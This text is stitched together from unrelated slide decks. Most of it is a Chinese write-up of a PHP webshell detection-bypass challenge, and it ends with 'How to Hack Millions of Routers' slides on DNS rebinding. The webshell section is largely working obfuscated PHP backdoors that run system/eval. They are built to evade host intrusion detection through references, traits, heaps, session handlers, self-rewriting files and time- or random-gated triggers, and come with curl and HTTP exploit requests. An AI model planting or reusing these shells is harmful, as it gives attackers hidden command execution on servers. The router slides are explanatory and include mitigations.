● Some topics NOT covered during main talk,
reserved for you to ask here
● Thank You for 3 great years of Credit Card
Security Talks | pdf |
HIDS PHP WebShell Bypass 研究与分析
——do9gy
背景:2022 年春天,参加了某 HIDS Bypass 挑战赛,赛题恰好是关于 PHP WebShell 绕
过的,结合 Fuzz 技术获得了几个侥幸可以绕过的样本,围绕#WebShell 检测那些事的主题,
与各位做一个分享。
挑战赛规则如下:
1、WebShell 指外部能传参控制(如通过 GET/POST/HTTP Header 头等方式)执行任
意代码 或命令,比如 eval($_GET[1]);。在文件写固定指令不算 Shell,被认定为无
效,如<?php system(‘whoami’);
2、绕过检测引擎的 WebShell 样本,需要同时提供完整有效的 curl 利用方式,
如:curl ‘http://127.0.0.1/webshell.php?1=system("whoami")';。curl 利用方式可以在
提供的 docker 镜像中进行编写测试,地址可以是容器 IP 或者 127.0.0.1,文件名
任意,以执行 whoami 作为命令示例。
3、WebShell 必须具备通用性,审核时会拉取提交的 WebShell 内容,选取一个和
验证镜 像相同的环境进行验证,如果不能正常运行,则认为无效。
4、审核验证 payload 有效性时,WebShell 文件名会随机化,不能一次性执行成功
和稳定 触发的,被认定为无效。
首先,我对查杀引擎进行了一定的猜测,根据介绍查杀引擎有两个,两个引擎同
时工作,只要有一个引擎检测出了 WebShell 返回结果就是查杀,根据经验推测,应
该是有一个静态的,另一个是动态的。对于静态引擎的绕过,可以通过拆分关键词、
加入能够引发解析干扰的畸形字符等;而对于动态引擎,需要分析它跟踪了哪些输入
点,又是如何跟踪变量的,最终是在哪些函数的哪些参数命中了恶意样本规则,于是
我开始了一些尝试。
0x01 CURL 引入参数
经过分析,引擎对$_GET $_POST $_COOKIE $_REQUEST $_FILES $_SERVER $GLOBALS
等几乎一切可以传递用户参数的全局变量都进行了过滤,但是对 curl 进来的内容却是没有
任何过滤,于是我们可以通过 CURL 引入参数。
<?php
$url="http://x/1.txt";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_HTTPHEADER,$headerArray);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
eval($output);
但是在这一点的评判上存在争议,本样本惨遭忽略。根据挑战赛规则,能够动态引入参
数即可,我个人认为 CURL 引入的参数也属于外部可控的参数内容。
0x02 get_meta_tags 引入参数
get_meta_tags 函数会对给定 url 的 meta 标签进行解析,自然也会发起 URL 请求。对
于能够发起外连的服务器来说,这个 PHP WebShell 样本是极具迷惑性的。
不过,之前 CURL 的被忽略了,这个我也就没有再提交。
<?php
get_meta_tags("http://x/1")["author"](get_meta_tags("http://x/1")["
keywords"]);
?>
此时,目标服务器上需要有相应的文件配合:
<meta name="author" content="system">
<meta name="keywords" content="ls">
通过动态修改该文件第二行的内容,可以给 system 传入不同的参数,参数内容是完全
可控的。
0x03 fpm_get_status 引入参数
比赛环境是 php-fpm 架构的,此时可以通过 fpm_get_status() 函数来获取参数。可打
印调试:
<?php
var_dump(fpm_get_status());
由此,构造样本:
<?php
system(fpm_get_status()["procs"][0]["query-string"]);
不过,并不能保证当前进程一直处于第一位,因此我第一次提交的样本虽然简短,但是
不满足规则中要求的一次性执行成功和稳定触发。因此,我后面又对样本进行了补充:
<?php
foreach(fpm_get_status()["procs"] as $val){
system($val["query-string"]);
}
但是,就在这个补充的间隙,已经有人提交了相同的 Payload,于是又遭到忽略了。
0x04 递归 GLOBALS 引入参数
经过测试,查杀引擎对$GLOBALS 全局变量传参点进行了检测,但是似乎没有严格执行
递归,通过一些变形即可绕过:
<?php
$m=($GLOBALS[GLOBALS]*n[GLOBALS][GLOBALS][GLOBALS][GLOBALS][GLOBALS
][_GET][b]);
substr(timezone_version_get(),2)($m);
由于静态引擎会直接拦截 system( ,所以,进行了一些包装,timezone_version_get()
在给定的测试环境中返回的值恰好是:0.system 。
关于这一点,我在 PHP 网站上看到了这样一段话:
If you get 0.system for the version, this means you have the version that PHP shipped
with. For a newer version, you must upgrade via the PECL extension (sudo pecl install
timezonedb)
传参数入口方面,我暂时就发现了这么多,接下来,我试图通过特殊的变量传递方式切
断动态查杀引擎的污点跟踪链。
0x05 模式一: Array 元素引用
<?php
$b = "111";
$c = "222";
if(get_cfg_var('error_reporting')>0){
$b="#";
}
$a = array( "one"=>$c,"two"=>&$c );
$url = "http://a/usr/".$b."?a=1";
$d =parse_url($url);
if($d['query']){
$c="echo 111;";
}
else{
$c=$_FILES['useraccount']['name'];
}
var_dump($a["two"]);
eval($a["two"]);
?>
经过无数次的 Fuzz,我终于弄清楚了动态查杀引擎的一些检测逻辑: 无论如何拼接、
变形、赋值,在整个 PHP 脚本生命周期内不允许出现 [危险函数]([可控参数]) 这样的情况。
我首先想到的是,利用变量引用来切断跟踪链条。
传统的变量传递,形如 $b=$a; $c=$b; $d=$c;
跟踪程序一定能够追踪到 $a 与 $d 的关系,进而清晰地解析出他们的值。
那么: $a="foo";$b=&$a; $b="system"; $a(xxx); 就 b 比之前进行了一些升级,如果引擎
仅简单根据等号赋值来跟踪,就很容易跟丢。经过测试,我发现引擎对这种直接的引用传递
十分敏感,无法构造 payload。因而,我用数组进行了包装,在数组中,我将 $c 与$a["two"]
绑定在一起:
$c = "222";
$a = array( "one"=>$c,"two"=>&$c );
这样,当$c 变化的时候,$a["two"]也会随之变化:
$c=$_FILES['useraccount']['name'];
var_dump($a["two"]);
经过测试,我发现引擎对可传递参数的全局变量也并不是一视同仁的,他们拥有不同的恶意
等级,其中$_GET $_POST $_COOKIE $_REQUEST 是最高恶意等级的,而$_FILES 恶意度较
低,因此,这里可以通过$_FILES 全局变量来接收用户传参。
仅仅是这样切断还是不够的,我将参数取值的判断进行了前移。简言之就是:
$c=$a==$b?'system':'foo'; 让$a==$b 来决定最终这个样本是 WebShell 还是普通文件,
我先控制,让$a==$b 返回 False,于是,样本检测通过了。但当为 True 时,样本检测变为
了查杀,这正是我想要的。
接下来,我试图通过 PHP 语法 Trick 来引起解析歧义,如:intval((0.1+0.7)*10) == 7 ,
经过测试,我发现动态查杀引擎也是使用的 PHP,因而不能引发歧义。进一步,我又引入了
PHP7 特定版本特有的一些 Trick,发现仍然无法引发歧义,我逐渐确定了引擎版本与测试环
境一致的这一事实。
既然如此,就只能通过环境因素来引起歧义了。我在这里之前,又引入了一片多米诺骨
牌,让动态跟踪引擎更加迷惑:
$url = "http://a/usr/".$b."?a=1";
$d =parse_url($url);
if($d['query']){
$c="echo 111;";
}
else{
$c=$_FILES['useraccount']['name'];
}
解析 URL 成功与否,将直接导致 $c 的赋值,而这一切又取决于 $b :
if(get_cfg_var('error_reporting')>0){
$b="#";
}
$b 如果等于 # , 将导致解析 URL 失败,我将是否推动多米诺骨牌第一块的这只手交给
get_cfg_var('error_reporting') ,我本地环境是配置了这个参数的,而我相信动态
查杀引擎没有配置,事实正如我所料。这一点的不一致,导致了最终的绕过。
根据这一模式,引申出来的绕过点有很多,不一一列举了,在 PhpStorm 中输入 get_即
可看到:
0x06 模式二: 反序列化引用
怎么能少得了反序列化呢?记得在 N 年前 php4fun 挑战赛 challenge8 中,一道与 L.N.
师傅有关的题令我印象深刻,其中使用的技术正是 PHP 反序列化引用。
<?php
$s=
unserialize('a:2:{i:0;O:8:"stdClass":1:{s:1:"a";i:1;}i:1;r:2;}');
$c = "123";
$arr= get_declared_classes();
$i=0;
for($i;$i<count($arr);$i++){
$i++;
$s[1]->a=$_GET['a'];
if($i<97 || $i>=98){
continue;
}
$c=$s[0]->a;
print(substr(get_declared_classes()[72],4,6)($c));
}
?>
通过反序列化,将数组$s[0] $s[1]两个元素绑定在一起,干扰了引擎动态污点跟踪。如
果结合那道题,可以将 stdClass 的对象中两个成员变量绑定在一起,更加具有迷惑性。
其他的触发点与模式一大致类似,这里就不做过多介绍了。
以上两个模式,搭配不同的能够引起差异的环境变量和不同的传参点,可以衍生出多种
payload,这里不过多进行列举。
0x07 trait
在对前两种模式 Fuzz 的同时,我发现了一个新的思路,这个思路虽然同样部分依赖于
系统环境变量,但是由于执行函数和传参都进行了变形,可以有效阻断污点追踪技术。
<?php
trait system{
}
$a= new JsonException($_GET['a']);
$c = "123";
$arr= getmygid();
$i=0;
for($i;$i<$arr;$i++){
$i++;
if($i<115 || $i>=116){
continue;
}
$c=$a->getMessage();
print(get_declared_traits()[0]($c));
}
get_declared_traits 将会获取到系统中已定义的 trait,因此获取到的函数名称为
system,而 JsonException ->getMessage() 能够将已储存的 Message 信息显示出来,
这里我如此初始化:$a= new JsonException($_GET['a']); 于是,分别从危险函数和
用户传参两个路径来狙击动态跟踪,发生了新的绕过。除了 JsonException 以外,我发现
引擎对内置接口的 getMessage 普遍不敏感,这样的内置类大致(未严格测试,其中可能
会有些类不支持 getMessage 方法)如下:
Error
ArithmeticError
DivisionByZeroError
AssertionError
ParseError
TypeError
ArgumentCountError
Exception
ClosedGeneratorException
DOMException
ErrorException
IntlException
LogicException
BadFunctionCallException
BadMethodCallException
DomainException
InvalidArgumentException
LengthException
OutOfRangeException
PharException
ReflectionException
RuntimeException
OutOfBoundsException
OverflowException
PDOException
RangeException
UnderflowException
UnexpectedValueException
SodiumException
0x08 SESSION
如果动态引擎去检查,他应该没有 SESSION,至少是在第一次的时候。
<?php
$b = "111";
$c = "222";
session_start();
$_SESSION['a']="#";
$a = array( "one"=>$c,"two"=>&$c );
$url = "http://a/usr/".$_SESSION['a']."?a=1";
$d =parse_url($url);
if($d['query']){
$c="echo 111;";
}
else{
$c=$_FILES['useraccount']['name'];
}
var_dump($a["two"]);
eval($a["two"]);
?>
模式基本上是与之前相同的,不同之处在于引入了 SESSION 变量来干扰 URL 解析,不
知为何,这样一次就通过了检测。其实更加高级的方法应该是这样的:
<?php
$b = "111";
$c = "222";
session_start();
$a = array( "one"=>$c,"two"=>&$c );
$url = "http://a/usr/".$_SESSION['a']."?a=1";
$d =parse_url($url);
if($d['query']){
$c="echo 111;";
}
else{
$c=$_FILES['useraccount']['name'];
}
var_dump($a["two"]);
eval($a["two"]);
$_SESSION['a']="#";
?>
由于规则需要一次性执行成功,因此需要在文件末尾加入:
if ($_SESSION['a']!="#"){
$_SESSION['a']="#";
print(1);
include(get_included_files()[0]);
}
触发该 WebShell 的 HTTP 请求为:
POST /x.php HTTP/1.1
Host: x
Content-Type: multipart/form-data;boundary=a;
Content-Length: 101
Cookie: PHPSESSID=bkukterqhtt79mrso0p6ogpqtm;
--a
Content-Disposition: form-data; name="useraccount"; filename="phpinfo();"
phpinfo();
--a--
0x09 SESSION 扩展
利用 SessionHandlerInterface 扩展的接口可以神不知鬼不觉地执行特定函数,直
接看代码:
<?php
ini_set("display_errors",1);
class MySessionHandler implements SessionHandlerInterface
{
// implement interfaces here
public function close()
{
// TODO: Implement close() method.
}
public function destroy($id)
{
// TODO: Implement destroy() method.
}
public function gc($max_lifetime)
{
// TODO: Implement gc() method.
}
public function open($path, $name)
{
$path($name);
}
public function read($id)
{
// TODO: Implement read() method.
}
public function write($id, $data)
{
// TODO: Implement write() method.
}
}
$handler = new MySessionHandler();
session_set_save_handler($handler, true);
session_name($_GET[a]);
session_save_path('system');
session_start();
0x0A 内存
之前有考虑过写入文件后 include,但是被规则禁止了,即便是 include session 文件也
不行,于是,想到了内存。
<?php
$a = new SplTempFileObject(1000000);
$a->fwrite( $_GET['a']);
$a->rewind();
substr(get_declared_classes()[72],4,6)($a->fgets());
?>
根据 PHP 文档:
如果设置了 maxMemory(默认 2M),那么 SplTempFile 会在内存中,这样就不存在文
件落地的问题了,写入内存后加载。
0x0B 修改自身
修改自身的洞都被认定为同一种绕过手法了,而且已经有人先提交,因此被忽略了,但
是仍然写出来供大家参考。
<?php
$s="Declaring file object\n";
$d=$_SERVER['DOCUMENT_ROOT'].$_SERVER['DOCUMENT_URI'];
$file = new SplFileObject($d,'w');
$file->fwrite("<?php"." eva".$s[3]);
$file->fwrite("(\$_"."GET"."[a]);?>");
include(get_included_files()[0]);
?>
直接的文件读写函数被禁止了,因此需要通过 SplFileObject 来写,由于需要一次性执行
和稳定触发,写入之后需要自己 include 自己。这种 WebShell 很有趣,就像是披着羊皮的
狼,上传的时候看起来平平无奇,被执行一次以后就完全变了模样。
沿用这个思路,还有一个点是可以写文件的:
<?php
ini_set("display_errors",1);
print "Declaring file object\n";
$f=__FILE__;
$file = new SplFileObject($f,'w');
$a=array("<?php /*", "*/eva","(\$_GET[a]);");
$file->fputcsv($a,'l');
$file=null;
include(get_included_files()[0]);
?>
不同之处在于,这里使用的是 fputcsv,此时,需要将写入文件以后所产生的分隔符进
行注释,因此在构造 payload 时需要花点心思。
更进一步,使用这个方法加载缓存也是可以的:
<?php
ini_set("display_errors",1);
$s="Declaring file objecT\n";
$file = new SplTempFileObject();
$file->fputcsv(explode('m',"evam(\$_GET[m]);"),'l');
$file->rewind();
eval($file->fgets());
?>
不过被认定为与内存重复了。
0x0C 堆排序
动态查杀引擎根据模拟执行的情况来进行判断,那么我们能否将好的坏的掺在一起,这
就像一个箱子里面有个 5 球,按号码从大到小摆放好,按顺序取,想办法让引擎取到正常的
球,而我们执行的时候通过控制参数取到能变为 WebShell 的球。我先放入 3 个正常的球 0、
7、8 和一个恶意的球'system',还有一个球我通过 GET 参数控制,暂且称之为 x。
当 x 取大于 8 以上的数字时,会有一个最大堆(绿色为按最大堆顶点依次导出的顺序):
当 x 取 “a” 时:
而 x 取 “99;ls” 时:
由此可见:不同的参数值,能够引发堆结构的改变。经过多次 Fuzz 测试,我发现 HIDS
查杀引擎对第三种情况没有考虑,于是,我通过依次将 i 取 1 和 i 取 2 来提取变量$a 和$b,
再通过 $a($b); 执行命令。
当然,在这种情况下,利用的 Payload 只能是 x.php?a=99;whoami 这种格式。
<?php
$obj=new SplMaxHeap();
$obj->insert( $_GET[a] );
$obj->insert( 8 );
$obj->insert( 'system' );
$obj->insert( 7 );
$obj->insert( 0 );
//$obj->recoverFromCorruption();
$i=0;
foreach( $obj as $number ) {
$i++;
if($i==1) {
$a = $number;
}
if($i==2) {
$b = $number;
}
}
$a($b);
0x0D 优先级队列
优先级队列与堆排序思想基本类似,不同的是,我这里使用优先级队列对 system 关键
词进行更细颗粒度的拆分。想办法让传参影响 system 每个字符的顺序。
请看样本:
<?php
ini_set("display_errors",1);
$objPQ = new SplPriorityQueue();
$objPQ->insert('m',1);
$objPQ->insert('s',6);
$objPQ->insert('e',3);
$objPQ->insert('s',4);
$objPQ->insert('y',5);
$objPQ->insert('t',$_GET[a]);
$objPQ->setExtractFlags(SplPriorityQueue::EXTR_DATA);
//Go to TOP
$objPQ->top();
$m='';
$cur = new ErrorException($_GET[b]);
while($objPQ->valid()){
$m.=$objPQ->current();
$objPQ->next();
}
echo $m($cur->getMessage());
?>
假设 GET 参数不存在或为 0,此时得到的函数为:sysemt 并不是危险函数。但是,当
$_GET['a']为 3 时,函数变成了: system ,就成为了危险函数。
该样本的利用 payload 为:/x.php?a=3&b=whoami
0x0E 内存不足
内存不足的思想是:查杀引擎的动态执行需要消耗内存空间,由于同一时间处理的样本
很多,因此单独给每个沙箱环境分配的内存往往不会太多,如果我构造一个样本,能够让查
杀引擎由于内存不足提前终止查杀,而在真实环境中内存可以满足执行需要,就能够执行到
恶意的代码了,恰好 PHP 的内存申请是可以通过 php_ini 在运行时动态修改的。
请看样本:
<?php
ini_set("display_errors",1);
class b extends SplObjectStorage {
public function getHash($o) {
return get_class($o);
}
}
$cur= new DomainException($_GET[a]);
?>
111111111111111111111111111111111111111111111111
<?php
ini_set("display_errors",1);
ini_set("memory_limit","100G");
echo memory_get_usage().'<br>';
$var = str_repeat("php7_do9gy", 100000000);
echo memory_get_usage();
class bb{}?>
111111111111111111111111111111111111111111111111
<?php
ini_set("display_errors",1);
class A {}
$s = new b;
$o2 = new stdClass;
$s[$o2] = 'system';
//these are considered equal to the objects before
//so they can be used to access the values stored under them
$p1 = new stdClass;
echo $s[$p1]($cur->getMessage());
?>
该样本关键的一段内容在:
<?php
ini_set("display_errors",1);
ini_set("memory_limit","100G");
echo memory_get_usage().'<br>';
$var = str_repeat("php7_do9gy", 100000000);
echo memory_get_usage();
这预计会消耗 1G 的内存空间。经过测试,我本地是可以执行成功的。
0x0F 未来 WebShell
思路:动态查杀是基于 PHP 文件上传后动态执行的,那么有没有可能上传一个文件,
上传时它还不是 WebShell,它自己过几分钟变成一个 WebShell 呢?这样在上传时就可以躲
过动态查杀。正好,结合 0x05 和 0x06 两种模式,我们尽可能将是否为 WebShell 的判断依
据前置到一个 if 条件中,然后让这个条件以当前时间为依据,那么上传时的 Unix 时间戳小
于某个值,返回结果 True,动态引擎自然判定这是一个正常的文件,而过一段时间,时间变
化了返回结果变为了 False,再去请求这个 WebShell 自然就能够执行了。
一直想构造这样一个未来的 webshell,但是由于网站对时间相关的函数过滤很严,直到我发
现了 DateTime 类的 getTimestamp 方法。
仅有这个思路是不够的,在实现时,还结合了反射的技巧以及 PHP 条件优化。
<?php
ini_set("display_errors",1);
function foo($test, $bar = FSYSTEM)
{
echo $test . $bar;
}
$function = new ReflectionFunction('foo');
$q = new ParseError($_GET[a]);
foreach ($function->getParameters() as $param) {
$da = new DateTime();
echo $da->getTimestamp();
echo 'Name: ' . $param->getName() . PHP_EOL;
$n='F';
if ($param->isOptional()) {
if($da->getTimestamp()>=1648470471||$n='1'){
echo $n;
}
echo 'Default value: ' .
ltrim($param->getDefaultValueConstantName(),$n)($q->getMessage());
}
echo PHP_EOL;
}
?>
构思:
1. ParseError getmessage 传递 get 参数。
2. ReflectionFunction 反射 FSYSTEM 函数
3. ltrim 替换 最左侧的 F,第一个参数是'F' 还是 ’1‘ 直接关系到 进入最后的函数名称
4. if($da->getTimestamp()>=1648470471||$n='1') 这一行利用 if 判断的优化执行,A || B
当 A 成立则 B 省略执行。 $da->getTimestamp()>=1648470471 类似于 time(),因为 time
函数被过滤了,只能这样传递。
1648470471 对应于 2022-03-28 20:27:51 ,此时通过 Webshell 检测,扫描的时候时
间 20:26 没到 20:27,因此它还不是 webshell,但是过一分钟访问变成 webshell 了。属
于一次性执行成功,但是前提是等一下再一次性执行。
利用方法:/x.php?a=ls
0x10 量子 WebShell
不满足于未来 WebShell 的挖掘,我又找到了一种新的模式——量子 WebShell。在 PHP
引擎查杀时,利用随机数,让判断条件在大多数情况下都不成立,此时这个 WebShell 处于
是 WebShell 和非 WebShell 的叠加态,当且仅当参数传递缩小随机数生成范围以后,让条件
恒成立,此时该样本坍缩到一个 WebShell 的状态,可以稳定触发。
请看代码:
<?php
ini_set("display_errors",1);
function foo($test, $bar = FSYSTEM)
{
echo $test . $bar;
}
$function = new ReflectionFunction('foo');
$q = new ParseError($_GET[a]);
$p = new ParseError($_SERVER[HTTP_A]);
foreach ($function->getParameters() as $param) {
$da = new DateTime();
echo $da->getTimestamp();
echo 'Name: ' . $param->getName() . PHP_EOL;
$n='F';
if ($param->isOptional()) {
if(mt_rand(55,$p->getMessage()??100)==55||$n='1'){
echo $n;
}
echo 'Default value: ' .
ltrim($param->getDefaultValueConstantName(),$n)($q->getMessage());
}
echo PHP_EOL;
}
?>
关键点在于:
mt_rand(55,$p->getMessage()??100)==55
在关键的判断函数中,我运用随机数生成函数 mt_rand ( 因为 rand 被过滤了),而该
随机数生成范围可以通过 HTTP 请求头参数来控制,当我传递 a: 55 时,就锁定了随机数区
间,确保判断条件成立。
利用方法:
GET /bbb/2.php?a=whoami HTTP/1.1
Host: aaa.com:955
a: 55
0x11 多类型文件
这个想法来自于“代码审计”知识星球中朽木自雕转发国外 CTF 的一道题,题目想要构
造一个文件,让这个文件既是 pdf 又是 wav 同时还要是 tar,经过一天的分析我解决了该题,
并且获益良多,于是我想:能否构造一个文件让它既是 PHP 文件又是 zip 文件呢?答案是
肯定的。请看文件:
php 代码仅仅为一句话,加载自己这个文件 zip 属性的 s.t 文件,那么 s.t 在哪里呢?就
在压缩包内。我将恶意文件 s.t 压缩为 zip 后将其十六进制内容拼接在这一句话代码的前后
两端,注意要复制两份同时拼接在前后两端,否则可能会解压失败。
经过测试 s.t 也不能是简单的 php 一句话木马,否则会被 HIDS 查杀,因此我对 s.t 也进行了
一定变形 s.t:
<?php
trait system{
}
get_declared_traits()[0]($_GET['a']);
由于给定环境没有任何 PHP 扩展,因此我使用了原生的 phar 来加载。
0x12 Phar 反序列化
沿用单个文件多类型的思路,我将其进一步扩展为 Phar 反序列化,这样做主要是规避
大多数 HIDS 对 include 的查杀。这个思路来自于 BlackHat2018 Sam Thomas 的一个议题,
主要介绍了 phar 在解析 phar 格式的文件时,内核会调用 phar_parse_metadata()解析
metadata 数据时,进而调用 php_var_unserialize()对其进行反序列化操作,因此会造成反序
列化漏洞。
由于代码中含有压缩文件,我以截图方式给出:
phar 文件的生成代码如下:
<?php
ini_set('display_errors',1);
class Test{
public $test="test";
}
@unlink("test.phar");
$phar = new Phar("test.phar"); //后缀名必须为 phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置 stub
$o = new Test();
$phar->setMetadata($o); //将自定义的 meta-data 存入 manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
$phar->stopBuffering(); //签名自动计算
var_dump($phar->getSignature());
同样的方法,构造好 Phar 文件以后将其二进制数据拼接到文件末尾,不同之处在于,
由于 Phar 文件有签名校验,拼接之后的文件会无法通过签名校验,因此我们还需要手动计
算和修改一下签名,这里各大家留下一个练习。 | pdf |
How to Hack Millions of Routers
Craig Heffner, Seismic LLC
SOHO Router…Security?
Common Attack Techniques
Cross Site Request Forgery
No trust relationship between browser and router
Can’t forge Basic Authentication credentials
Anti-CSRF
Limited by the same origin policy
DNS Rebinding
Rebinding prevention by OpenDNS / NoScript / DNSWall
Most rebinding attacks no longer work
Most…
Multiple A Record Attack
Better known as DNS load balancing / redundancy
Return multiple IP addresses in DNS response
Browser attempts to connect to each IP addresses in order
If one IP goes down, browser switches to the next IP in the list
Limited attack
Can rebind to any public IP address
Can’t rebind to an RFC1918 IP addresses
Rebinding to a Public IP
1.4.1.4
2.3.5.8
Target IP:
2.3.5.8
Attacker IP:
1.4.1.4
Attacker Domain:
attacker.com
Rebinding to a Public IP
1.4.1.4
2.3.5.8
What is the IP address for
attacker.com?
Rebinding to a Public IP
1.4.1.4
2.3.5.8
1.4.1.4
2.3.5.8
Rebinding to a Public IP
1.4.1.4
2.3.5.8
GET / HTTP/1.1
Host: attacker.com
Rebinding to a Public IP
1.4.1.4
2.3.5.8
<script>…</script>
Rebinding to a Public IP
1.4.1.4
2.3.5.8
GET / HTTP/1.1
Host: attacker.com
Rebinding to a Public IP
1.4.1.4
2.3.5.8
TCP RST
Rebinding to a Public IP
1.4.1.4
2.3.5.8
GET / HTTP/1.1
Host: attacker.com
Rebinding to a Public IP
1.4.1.4
2.3.5.8
<html>…</html>
Rebinding to a Private IP
1.4.1.4
Target IP:
192.168.1.1
Attacker IP:
1.4.1.4
Attacker Domain:
attacker.com
192.168.1.1
Rebinding to a Private IP
1.4.1.4
What is the IP address for
attacker.com?
192.168.1.1
Rebinding to a Private IP
1.4.1.4
1.4.1.4
192.168.1.1
192.168.1.1
Rebinding to a Private IP
1.4.1.4
GET / HTTP/1.1
Host: attacker.com
192.168.1.1
Rebinding to a Private IP
1.4.1.4
<html>…</html>
192.168.1.1
Services Bound to All Interfaces
# netstat –l
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:80 *:* LISTEN
tcp 0 0 *:53 *:* LISTEN
tcp 0 0 *:22 *:* LISTEN
tcp 0 0 *:23 *:* LISTEN
Firewall Rules Based on Interface Names
-A INPUT –i etho –j DROP
-A INPUT –j ACCEPT
IP Stack Implementations
RFC 1122 defines two IP models:
Strong End System Model
Weak End System Model
The Weak End System Model
RFC 1122, Weak End System Model:
A host MAY silently discard an incoming datagram whose
destination address does not correspond to the physical
interface through which it is received.
A host MAY restrict itself to sending (non-source-routed) IP
datagrams only through the physical interface that corresponds
to the IP source address of the datagrams.
Weak End System Model
eth1
192.168.1.1
eth0
2.3.5.8
Weak End System Model
TCP SYN Packet
Source IP: 192.168.1.100
Destination IP: 2.3.5.8
Destination Port: 80
eth1
192.168.1.1
eth0
2.3.5.8
Weak End System Model
TCP SYN/ACK Packet
Source IP: 2.3.5.8
Destination IP: 192.168.1.100
Source Port: 80
eth1
192.168.1.1
eth0
2.3.5.8
Weak End System Model
TCP ACK Packet
Source IP: 192.168.1.100
Destination IP: 2.3.5.8
Destination Port: 80
eth1
192.168.1.1
eth0
2.3.5.8
Traffic Capture
End Result
Public IP Rebinding Attack
1.4.1.4
Target IP:
2.3.5.8
Attacker IP:
1.4.1.4
Attacker Domain:
attacker.com
2.3.5.8
Public IP Rebinding Attack
1.4.1.4
What is the IP address for
attacker.com?
2.3.5.8
Public IP Rebinding Attack
1.4.1.4
1.4.1.4
2.3.5.8
2.3.5.8
Public IP Rebinding Attack
1.4.1.4
GET / HTTP/1.1
Host: attacker.com
2.3.5.8
Public IP Rebinding Attack
1.4.1.4
<script>...</script>
2.3.5.8
Public IP Rebinding Attack
1.4.1.4
GET / HTTP/1.1
Host: attacker.com
2.3.5.8
Public IP Rebinding Attack
1.4.1.4
TCP RST
2.3.5.8
Public IP Rebinding Attack
1.4.1.4
GET / HTTP/1.1
Host: attacker.com
2.3.5.8
Public IP Rebinding Attack
1.4.1.4
<html>…</html>
2.3.5.8
Public IP Rebinding Attack
Pros:
Nearly instant rebind, no delay or waiting period
Don’t need to know router’s internal IP
Works in all major browsers: IE, FF, Opera, Safari, Chrome
Cons:
Router must meet very specific conditions
Must bind Web server to the WAN interface
Firewall rules must be based on interface names, not IP addresses
Must implement the weak end system model
Not all routers are vulnerable
Affected Routers
Asus
Belkin
Dell
Thompson
Linksys
Third Party Firmware
ActionTec
Making the Attack Practical
To make the attack practical:
Must obtain target’s public IP address automatically
Must coordinate services (DNS, Web, Firewall)
Must do something useful
Tool Release: Rebind
Provides all necessary services
DNS, Web, Firewall
Serves up JavaScript code
Limits foreground activity
Makes use of cross-domain XHR, if supported
Supports all major Web browsers
Attacker can browse target routers in real-time
Via a standard HTTP proxy
Rebind
2.3.5.8
1.4.1.4
Target IP: 2.3.5.8
Rebind IP: 1.4.1.4
Attacker Domain: attacker.com
Rebind
Rebind
Rebind
2.3.5.8
1.4.1.4
What is the IP address for
attacker.com?
Rebind
2.3.5.8
1.4.1.4
1.4.1.4
Rebind
2.3.5.8
1.4.1.4
GET /init HTTP/1.1
Host: attacker.com
Rebind
2.3.5.8
1.4.1.4
Location: http://wacme.attacker.com/exec
Rebind
2.3.5.8
1.4.1.4
What is the IP address for
wacme.attacker.com?
Rebind
2.3.5.8
1.4.1.4
1.4.1.4
2.3.5.8
Rebind
2.3.5.8
1.4.1.4
GET /exec HTTP/1.1
Host: wacme.attacker.com
Rebind
2.3.5.8
1.4.1.4
<script>…</script>
Rebind
2.3.5.8
1.4.1.4
GET / HTTP/1.1
Host: wacme.attacker.com
Rebind
2.3.5.8
1.4.1.4
TCP RST
Rebind
2.3.5.8
1.4.1.4
GET / HTTP/1.1
Host: wacme.attacker.com
Rebind
2.3.5.8
1.4.1.4
<html>…</html>
Rebind
2.3.5.8
1.4.1.4
GET /poll HTTP/1.1
Host: attacker.com:81
Rebind
2.3.5.8
1.4.1.4
Rebind
Rebind
2.3.5.8
1.4.1.4
GET http://2.3.5.8/ HTTP/1.1
Rebind
2.3.5.8
1.4.1.4
GET /poll HTTP/1.1
Host: attacker.com:81
Rebind
2.3.5.8
1.4.1.4
GET / HTTP/1.1
Rebind
2.3.5.8
1.4.1.4
GET / HTTP/1.1
Host: wacme.attacker.com
Rebind
2.3.5.8
1.4.1.4
<html>…</html>
Rebind
2.3.5.8
1.4.1.4
POST /exec HTTP/1.1
Host: attacker.com:81
<html>…</html>
Rebind
2.3.5.8
1.4.1.4
<html>…</html>
Rebind
Demo
More Fun With Rebind
Attacking SOAP services
UPnP
HNAP
We can rebind to any public IP
Proxy attacks to other Web sites via your browser
As long as the site doesn’t check the host header
DNS Rebinding Countermeasures
Am I Vulnerable?
End-User Mitigations
Break any of the attack’s conditions
Interface binding
Firewall rules
Routing rules
Disable the HTTP administrative interface
Reduce the impact of the attack
Basic security precautions
Blocking Attacks at the Router
Don’t bind services to the external interface
May not have sufficient access to the router to change this
Some services don’t give you a choice
Re-configure firewall rules
-A INPUT –i eth1 –d 172.69.0.0/16 –j DROP
HTTP Administrative Interface
Disable the HTTP interface
Use HTTPS / SSH
Disable UPnP while you’re at it
But be warned…
Enabling HTTPS won’t disable HTTP
In some routers you can’t disable HTTP
Some routers have HTTP listening on alternate ports
In some routers you can’t disable HNAP
Blocking Attacks at the Host
Re-configure firewall rules
-A INPUT –d 172.69.0.0/16 –j DROP
Configure dummy routes
route add -net 172.69.0.0/16 gw 127.0.0.1
Basic Security Precautions
Change your router’s default password
Keep your firmware up to date
Don’t trust un-trusted content
Vendor / Industry Solutions
Fix the same-origin policy in browsers
Implement the strong end system model in routers
Build DNS rebinding mitigations into routers
Conclusion
DNS rebinding still poses a threat to your LAN
Tools are available to exploit DNS rebinding
Only you can prevent forest fires
Q & A
Rebind project
http://rebind.googlecode.com
Contact
[email protected]
References
Java Security: From HotJava to Netscape and Beyond
http://www.cs.princeton.edu/sip/pub/oakland-paper-96.pdf
Protecting Browsers From DNS Rebinding Attacks
http://crypto.stanford.edu/dns/dns-rebinding.pdf
Design Reviewing the Web
http://www.youtube.com/watch?v=cBF1zp8vR9M
Intranet Invasion Through Anti-DNS Pinning
https://www.blackhat.com/presentations/bh-usa-
